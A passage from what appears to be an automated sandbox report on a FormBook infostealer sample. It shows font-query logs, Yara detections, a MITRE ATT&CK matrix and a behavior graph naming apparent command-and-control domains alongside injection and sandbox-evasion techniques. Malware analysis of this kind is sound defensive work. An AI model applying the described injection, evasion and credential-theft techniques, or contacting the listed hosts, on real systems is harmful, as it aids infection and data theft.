            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433343 Sample: UOMp9cDcqZ Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 33 www.zgcbw.net 2->33 35 clientconfig.passport.net 2->35 37 www.trendbold.com 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 7 other signatures 2->51 11 UOMp9cDcqZ.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\UOMp9cDcqZ.exe.log, ASCII 11->31 dropped 61 Tries to detect virtualization through RDTSC time measurements 11->61 63 Injects a PE file into a foreign processes 11->63 15 UOMp9cDcqZ.exe 11->15         started        signatures6 process7 signatures8 65 Modifies the context of a thread in another process (thread injection) 15->65 67 Maps a DLL or memory area into another process 15->67 69 Sample uses process 